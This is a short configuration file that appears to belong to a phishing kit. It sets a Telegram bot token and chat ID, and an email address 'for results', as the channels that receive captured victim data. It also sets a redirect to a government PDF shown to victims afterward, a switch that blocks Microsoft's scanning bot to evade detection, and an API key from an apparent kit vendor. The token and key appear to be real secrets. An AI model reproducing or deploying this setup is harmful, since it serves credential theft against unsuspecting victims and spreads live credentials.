;Your bot token here
bot="5241386819:AAH4iHuDCgrJJQDkXUNFZLqBZaZaFkza364"
;Your Chat Id here
chat="1813243185"
;Your email for results here
email='';
;Your Redirect Url Here
finish="https://www.dol.gov/ui/data.pdf"
;To send visits or not 1/0
send_visit="0"
;To block microsoft bot set to 1
block_bot="1"
;Your api key here,you can get one from @fisherstell
api="d1aa38ea1271be3a9b44b3695f6ca8215518bd144e429e975a"